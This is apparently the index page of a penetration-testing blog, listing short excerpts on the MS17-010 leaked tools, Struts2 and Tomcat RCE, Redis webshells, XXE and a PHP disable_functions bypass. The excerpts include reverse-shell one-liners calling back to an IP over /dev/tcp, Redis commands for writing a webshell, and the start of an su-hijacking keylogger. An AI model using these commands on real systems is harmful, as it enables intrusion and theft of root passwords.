Urahara Blog

一生想做浪漫极客

Equation Group泄漏工具简单试用与MS17-010漏洞利用

Analysis of the Vulnerabilities

简介 Shadow Brokers周末公布的文件无疑对互联网造成了一次大地震,因为已经很久没有出现过像ms08-067这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。而让人佩服的不仅是漏洞,还有泄漏出来的FuzzBunch攻击框架,但是这两天大家都是配合MSF来完成的漏洞利用,所以研究了一下自带的DanderSpritz工具,感觉也是挺震撼的。总之,个人觉得FuzzBun...

Apache Struts2 Remote Code Execution (S2-046)

Analysis of the Vulnerabilities

Versions Affected Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 And you are using Jakarta based file upload Multipart parser Description s2-046这个漏洞其实和s2-045漏洞触发的本质是一样的,都使用了同一个异常处理方法,且...

Apache Struts2 Remote Code Execution (S2-045)

Analysis of the Vulnerabilities

Versions Affected Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 And you are using Jakarta based file upload Multipart parser Description It is possible to perform a RCE attack with...

Redis Hacking Tips

collection

Get Webshell ​ You must know the physical path of the Web site root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html OK 10.85.0.52:6379> config set d...

Some Ways To Create An Interactive Shell On Linux

A little record|Continuously updated

Bash $ bash -i >& /dev/tcp/192.168.68.206/2333 0>&1 $ exec 196<>/dev/tcp/192.168.68.206/2333; sh <&196 >&196 2>&196 $ exec 5<>/dev/tcp/192.168.68.206...

Keyboard Logger On Linux - Part 1

Serial

alias su keylogger 在一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py’,低权限用户su root后成功记录密码,但使用这种方法后管理员无法正常su切换至root用户下,所以比较容易被管理员发现。密码记录路径请看脚本。 #!/usr/bin/python # -*- coding: cp936 -*- import os, sy...

PHP Disabled_functions Bypass

bypass

PHP 5.x Shellshock Exploit # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # CVE: CVE-2014-6271 <pre> <?php echo "Disabled functions: ".ini_get('disable_functions')...

域渗透-信息收集基础

内网渗透-域环境

判断当前服务器是否在域内 RDS 如果目标服务器远程桌面服务开启,可尝试进行连接,若在用户名和密码栏下还有一个登录到(L)选项,下拉选项栏如果除了计算机名(此计算机)选项外还有其他选项,则此服务器可能位于域中,且选项名即为域名; net time /domain 执行该命令,有三种情况:第一种如果存在域会从域控返回时间,并在第一行返回域控及域名;第二种如...

Apache Tomcat Remote Code Execution(CVE-2016-8735)

Pentesting on linux

Versions Affected Apache Tomcat 9.0.0.M1 to 9.0.0.M11 Apache Tomcat 8.5.0 to 8.5.6 Apache Tomcat 8.0.0.RC1 to 8.0.38 Apache Tomcat 7.0.0 to 7.0.72 Apache Tomcat 6.0.0 to 6.0.47 Earlier, unsupporte...

Hacking via XXE

on way

XML简介 ​ XML 指可扩展标记语言(EXtensible Markup Language),有点类似 HTML,但它与HTML的区别在于其设计宗旨是传输数据,而非显示数据。XML常被用来作为配置文件(spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVG header)及数据传输共享。 XML文档格式 ​ XML文件一般存在三部分,包括XML...